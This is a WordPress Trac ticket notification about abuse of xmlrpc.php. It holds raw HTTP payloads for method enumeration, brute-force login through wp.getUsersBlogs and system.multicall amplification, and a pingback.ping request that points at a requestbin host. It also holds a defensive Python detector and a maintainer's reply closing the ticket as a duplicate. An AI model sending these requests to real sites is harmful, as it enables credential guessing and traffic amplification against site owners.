[wp-trac] [WordPress Trac] #47856: I found that productivity should be turned off from the beginning or minimized possible harmful functions but it still exists in wordpress.org/xmlrpc.php like Multi brute force and DDoS attack. If you check the data correctly, you will see its search hazard.

WordPress Trac noreply at wordpress.org
Fri Aug 9 13:50:51 UTC 2019


#47856: I found that productivity should be turned off from the beginning or
minimized possible harmful functions but it still exists in
wordpress.org/xmlrpc.php like Multi brute force and DDoS attack. If you
check the data correctly, you will see its search hazard.
--------------------------+------------------------
 Reporter:  victim01      |       Owner:  (none)
     Type:  defect (bug)  |      Status:  closed
 Priority:  normal        |   Milestone:
Component:  XML-RPC       |     Version:
 Severity:  normal        |  Resolution:  duplicate
 Keywords:                |     Focuses:  rest-api
--------------------------+------------------------
Changes (by SergeyBiryukov):

 * status:  assigned => closed
 * resolution:   => duplicate
 * component:  General => XML-RPC
 * milestone:  Awaiting Review =>


Old description:

> ## I found that productivity should be turned off from the beginning or
> minimized possible harmful functions but it still exists in
> wordpress.org/xmlrpc.php like Multi brute force and DDoS attack. If you
> check the data correctly, you will see its search hazard.
> 1. First with the payload I list the available methods and can be
> exploited like:
> - wp.getUserBlogs
> - wp.getC loại
> - metaWeblog.getUsersBlogs
> - system.multicall
> - pingback.ping
>
> POST /xmlrpc.php HTTP/1.1
> Host: wordpress.org
> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0)
> Gecko/20100101 Firefox/68.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Connection: close
> Upgrade-Insecure-Requests: 1
> Content-Length: 141
>
> <?xml version="1.0" encoding="UTF-8"?>
> <methodCall>
> <methodName> system.listMethods </methodName>
> <params> </params>
> </methodCall>
> ## Bruteforce attack
> The first place I can exploit is brute force login!
> POST /xmlrpc.php HTTP/1.1
> Host: wordpress.org
> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0)
> Gecko/20100101 Firefox/68.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Connection: close
> Upgrade-Insecure-Requests: 1
> Content-Length: 208
>
> <?xml version="1.0" encoding="UTF-8"?>
> <methodCall>
> <methodName>wp.getUsersBlogs</methodName>
> <params>
> <param><value>admin</value></param>
> <param><value>pass</value></param>
> </params>
> </methodCall>
>
> 3. Now I can easily log in with different methods by available methods,
> and I can write a code to attack it with the existing user and password.
> That will take a lot of time but will have results. It can happen faster
> when you read my third item !!!
>
> ## DDoS attack
> Method pingback.ping
>
> The intent of Pingback is to notify a site that you link to about the
> link hoping that the site you are linking to will return the favor. Some
> systems automate this and maintain automated lists linking back to sites
> that covered their article. In order to implement pingback, WordPress
> implements an XML-RPC API function. This function will then send a
> request to the site to which you would like to send a "pingback".
> However, an attacker can take advantage of it to walk around DDoS attacks
> that affect the service.
> POST /xmlrpc.php HTTP/1.1
> Host: wordpress.org
> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0)
> Gecko/20100101 Firefox/68.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Connection: close
> Upgrade-Insecure-Requests: 1
> Content-Length: 249
>
> <methodCall>
> <methodName>pingback.ping</methodName>
> <params><param>
> <value><string>http://requestbin.net/r/1ak1hs11</string></value>
> </param><param><value><string>https://wordpress.org/news/</string>
> </value></param></params>
> </methodCall>
>
> ## Multicall
> This increases the attack capability of methods, for example when
> attacking bruteforce
> The vulnerability can easily be abused by a simple script to try a
> significant number of username and password combinations with a
> relatively small number of HTTP requests. The following diagram shows a
> 4-fold increase in login attempts to HTTP requests, but this can
> trivially be expanded to a thousand logins.
>
> POST /xmlrpc.php HTTP/1.1
> Host: wordpress.org
> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0)
> Gecko/20100101 Firefox/68.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Connection: close
> Upgrade-Insecure-Requests: 1
> Content-Length: 929
>
> <?xml version="1.0"?>
> <methodCall>
> <methodName>system.multicall</methodName>
> <params>
>   <param><value><array><data>
>   <value><struct>
>   <member>
>         <name>methodName</name>
>         <value><string>wp.getUsersBlogs</string></value>
>   </member>
>   <member>
>         <name>params</name><value><array><data>
>         <value><array><data>
>         <value><string>admin</string></value>
>         <value><string>password</string></value>
>         </data></array></value>
>         </data></array></value>
>   </member>
>   </struct></value>
>   <value><struct>
>   <member>
>         <name>methodName</name>
>         <value><string>wp.getUsersBlogs</string></value>
>   </member>
>   <member>
>         <name>params</name>
>         <value><array><data>
>         <value><array><data>
>           <value><string>admin</string></value>
>           <value><string>password</string></value>
>           </data></array></value>
>         </data></array></value>
>   </member>
>   </struct></value>
>   </data></array></value>
>   </param>
> </params>
> </methodCall>
>
> What about combining it with some other way? For pingback methods, for
> example. It increases time and danger !!
> During testing, I was able to call the method wp.getUserBlogs 1,000 times
> in a single HTTP request (limited only by PHP memory issues). If a user
> creates a simple shell loop that executes one thousand times and runs a
> PHP script that crafts an HTTP request with one thousand method calls all
> requiring authentication, then that user would be able to try one million
> unique logins in a very short period of time.
>
> This makes brute forcing the login very fast and can run down a pretty
> large wordlist in a short period of time. Also note that the
> wp.getUserBlogs method isn’t the only RPC call requiring authentication.
> It’s possible to use any RPC method which requires authentication to
> attempt logins and brute force the Wordpress credentials.
>
> Damage from the above holes is the damage to the remains that need to be
> patched. You can remove it if not needed. Or minimize the methods that
> can cause injury as the above methods !!!
> ## NOTE:
> + A nice stop gap to this as well, block all *.php requests in your WAF if
> you can. All of our legitimate requests for WP are relative links with the
> ".php" chopped off. By blocking *.php at WAF we are actually blocking
> 99.7% of all automated scanners and botnet traffic looking for WP sites.
> + Turn off some dangerous functions
>
> ## Document:
> https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32
> https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html
> https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/
>
> ------Thanks for reading-------

New description:

 ## I found that productivity should be turned off from the beginning or
 minimized possible harmful functions but it still exists in
 wordpress.org/xmlrpc.php like Multi brute force and DDoS attack. If you
 check the data correctly, you will see its search hazard.

 1. First with the payload I list the available methods and can be exploited
 like:
 - wp.getUserBlogs
 - wp.getC loại
 - metaWeblog.getUsersBlogs
 - system.multicall
 - pingback.ping
 {{{
 POST /xmlrpc.php HTTP/1.1
 Host: wordpress.org
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0)
 Gecko/20100101 Firefox/68.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: close
 Upgrade-Insecure-Requests: 1
 Content-Length: 141

 <?xml version="1.0" encoding="UTF-8"?>
 <methodCall>
 <methodName> system.listMethods </methodName>
 <params> </params>
 </methodCall>
 }}}

 ## Bruteforce attack
 The first place I can exploit is brute force login!
 {{{
 POST /xmlrpc.php HTTP/1.1
 Host: wordpress.org
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0)
 Gecko/20100101 Firefox/68.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: close
 Upgrade-Insecure-Requests: 1
 Content-Length: 208

 <?xml version="1.0" encoding="UTF-8"?>
 <methodCall>
 <methodName>wp.getUsersBlogs</methodName>
 <params>
 <param><value>admin</value></param>
 <param><value>pass</value></param>
 </params>
 </methodCall>
 }}}
 3. Now I can easily log in with different methods by available methods,
 and I can write a code to attack it with the existing user and password.
 That will take a lot of time but will have results. It can happen faster
 when you read my third item !!!

 ## DDoS attack
 Method pingback.ping

 The intent of Pingback is to notify a site that you link to about the link
 hoping that the site you are linking to will return the favor. Some
 systems automate this and maintain automated lists linking back to sites
 that covered their article. In order to implement pingback, WordPress
 implements an XML-RPC API function. This function will then send a request
 to the site to which you would like to send a "pingback".
 However, an attacker can take advantage of it to walk around DDoS attacks
 that affect the service.
 {{{
 POST /xmlrpc.php HTTP/1.1
 Host: wordpress.org
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0)
 Gecko/20100101 Firefox/68.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: close
 Upgrade-Insecure-Requests: 1
 Content-Length: 249

 <methodCall>
 <methodName>pingback.ping</methodName>
 <params><param>
 <value><string>http://requestbin.net/r/1ak1hs11</string></value>
 </param><param><value><string>https://wordpress.org/news/</string>
 </value></param></params>
 </methodCall>
 }}}
 ## Multicall
 This increases the attack capability of methods, for example when
 attacking bruteforce
 The vulnerability can easily be abused by a simple script to try a
 significant number of username and password combinations with a relatively
 small number of HTTP requests. The following diagram shows a 4-fold
 increase in login attempts to HTTP requests, but this can trivially be
 expanded to a thousand logins.
 {{{
 POST /xmlrpc.php HTTP/1.1
 Host: wordpress.org
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0)
 Gecko/20100101 Firefox/68.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: close
 Upgrade-Insecure-Requests: 1
 Content-Length: 929

 <?xml version="1.0"?>
 <methodCall>
 <methodName>system.multicall</methodName>
 <params>
   <param><value><array><data>
   <value><struct>
   <member>
         <name>methodName</name>
         <value><string>wp.getUsersBlogs</string></value>
   </member>
   <member>
         <name>params</name><value><array><data>
         <value><array><data>
         <value><string>admin</string></value>
         <value><string>password</string></value>
         </data></array></value>
         </data></array></value>
   </member>
   </struct></value>
   <value><struct>
   <member>
         <name>methodName</name>
         <value><string>wp.getUsersBlogs</string></value>
   </member>
   <member>
         <name>params</name>
         <value><array><data>
         <value><array><data>
           <value><string>admin</string></value>
           <value><string>password</string></value>
           </data></array></value>
         </data></array></value>
   </member>
   </struct></value>
   </data></array></value>
   </param>
 </params>
 </methodCall>
 }}}
 What about combining it with some other way? For pingback methods, for
 example. It increases time and danger !!
 During testing, I was able to call the method wp.getUserBlogs 1,000 times
 in a single HTTP request (limited only by PHP memory issues). If a user
 creates a simple shell loop that executes one thousand times and runs a
 PHP script that crafts an HTTP request with one thousand method calls all
 requiring authentication, then that user would be able to try one million
 unique logins in a very short period of time.

 This makes brute forcing the login very fast and can run down a pretty
 large wordlist in a short period of time. Also note that the
 wp.getUserBlogs method isn’t the only RPC call requiring authentication.
 It’s possible to use any RPC method which requires authentication to
 attempt logins and brute force the WordPress credentials.

 Damage from the above holes is the damage to the remains that need to be
 patched. You can remove it if not needed. Or minimize the methods that can
 cause injury as the above methods !!!
 ## NOTE:
 + A nice stop gap to this as well, block all *.php requests in your WAF if
 you can. All of our legitimate requests for WP are relative links with the
 ".php" chopped off. By blocking *.php at WAF we are actually blocking
 99.7% of all automated scanners and botnet traffic looking for WP sites.
 + Turn off some dangerous functions

 ## Document:
 https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32
 https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html
 https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/

 ------Thanks for reading-------
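
 The two patterns the ticket above describes, brute-force amplification
 through system.multicall and pingback.ping making the server fetch a
 caller-chosen URL, seen from the defender's side. The following is an added
 Python example, not WordPress code and not the reporter's: it parses one
 XML-RPC request body (as a WAF, reverse proxy or request log would hand it
 over), counts the credential guesses the request carries, and flags
 multicall batches above a threshold and pingbacks together with the source
 URL the server would be asked to fetch. The set of authenticating method
 names, the threshold and the sample bodies (shaped like the ticket's
 requests, with placeholder hosts and passwords) are assumptions.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from typing import List, Optional, Union

# Methods whose first two parameters are (username, password), so each call is
# one credential guess. Names from the ticket; assumption: the real set of
# authenticating XML-RPC methods is larger, extend as needed.
AUTH_METHODS = {"wp.getUsersBlogs", "wp.getUserBlogs", "metaWeblog.getUsersBlogs"}
# Constructed policy: more guesses than this per HTTP request is amplification.
MAX_TRIES_PER_REQUEST = 1


@dataclass
class Finding:
    method: str
    credential_tries: int = 0                    # guesses this request carries
    nested_methods: List[str] = field(default_factory=list)
    pingback_source: Optional[str] = None        # URL the server would fetch
    reason: Optional[str] = None                 # set when the request is flagged

    @property
    def suspicious(self) -> bool:
        return self.reason is not None


def _scalar(value_el: ET.Element) -> str:
    """Text of a <value>, typed (<value><string>x</string></value>) or bare."""
    child = value_el.find("*")
    text = child.text if child is not None else value_el.text
    return (text or "").strip()


def analyze_xmlrpc(body: Union[bytes, str]) -> Finding:
    """Parse one XML-RPC methodCall body and report what it would make the server do."""
    raw = body.encode("utf-8") if isinstance(body, str) else body
    root = ET.fromstring(raw)
    if root.tag != "methodCall":
        raise ValueError("not an XML-RPC methodCall")
    method = (root.findtext("methodName") or "").strip()
    finding = Finding(method=method)
    params = root.findall("./params/param/value")

    if method in AUTH_METHODS:
        finding.credential_tries = 1
    elif method == "pingback.ping" and params:
        # pingback.ping(sourceURI, targetURI): the server fetches sourceURI to
        # verify the link, so the caller chooses where the site sends traffic.
        finding.pingback_source = _scalar(params[0])
        finding.reason = "pingback.ping asks the server to fetch a caller-chosen URL"
    elif method == "system.multicall" and params:
        # Single parameter: an array of {methodName, params} structs that the
        # server executes in turn, so guesses multiply per HTTP request.
        for call in params[0].findall("./array/data/value/struct"):
            members = {(m.findtext("name") or "").strip(): m.find("value")
                       for m in call.findall("member")}
            name_el = members.get("methodName")
            inner = _scalar(name_el) if name_el is not None else ""
            finding.nested_methods.append(inner)
            if inner in AUTH_METHODS:
                finding.credential_tries += 1

    if finding.credential_tries > MAX_TRIES_PER_REQUEST:
        finding.reason = (f"{finding.credential_tries} credential tries in one "
                          "HTTP request via system.multicall")
    return finding


# Constructed sample bodies shaped like the requests quoted in the ticket;
# hosts, paths and passwords are placeholders.
SINGLE_LOGIN = b"""<?xml version="1.0" encoding="UTF-8"?>
<methodCall><methodName>wp.getUsersBlogs</methodName>
<params><param><value>admin</value></param><param><value>pass</value></param></params>
</methodCall>"""

MULTICALL_LOGIN = b"""<?xml version="1.0"?>
<methodCall><methodName>system.multicall</methodName>
<params><param><value><array><data>
<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
<member><name>params</name><value><array><data><value><array><data>
<value><string>admin</string></value><value><string>password</string></value>
</data></array></value></data></array></value></member></struct></value>
<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
<member><name>params</name><value><array><data><value><array><data>
<value><string>admin</string></value><value><string>letmein</string></value>
</data></array></value></data></array></value></member></struct></value>
</data></array></value></param></params>
</methodCall>"""

PINGBACK = b"""<methodCall><methodName>pingback.ping</methodName>
<params><param><value><string>http://collector.example/placeholder</string></value></param>
<param><value><string>https://blog.example/news/</string></value></param></params>
</methodCall>"""

if __name__ == "__main__":
    for body in (SINGLE_LOGIN, MULTICALL_LOGIN, PINGBACK):
        f = analyze_xmlrpc(body)
        print(f"{f.method}: tries={f.credential_tries} flagged={f.suspicious} {f.reason or ''}")
```

 Run as is, it reports one guess for the plain wp.getUsersBlogs call, two
 guesses for the multicall and a flagged pingback with its source URL. The
 count is what matters operationally: a single request carrying a thousand
 guesses, as the ticket describes, looks like one login failure in an
 access log unless the body is inspected, so this kind of check belongs at
 the WAF or proxy where request bodies are visible, which is also the
 server-level handling the Trac comment points to.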

--

Comment:

 Hi @victim01, welcome to WordPress Trac!

 A DoS (Denial of Service) against `xmlrpc.php` is no different to one
 against the homepage or `wp-login.php`; preventing it is out of scope for
 WordPress. Caching and security plugins often attempt to cover this well,
 but ultimately it's an issue that needs to be handled at the server level.

 See #35532, #36806, #24193, and other similar tickets.

 See also #34336 for some details on `system.multicall`.

 Additionally, when writing this ticket you should have seen this notice:

 > **Do not report potential security vulnerabilities here.**
 > See the [https://make.wordpress.org/core/handbook/reporting-security-vulnerabilities/ Security FAQ] and visit the [https://hackerone.com/wordpress WordPress HackerOne program].

-- 
Ticket URL: <https://core.trac.wordpress.org/ticket/47856#comment:1>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform

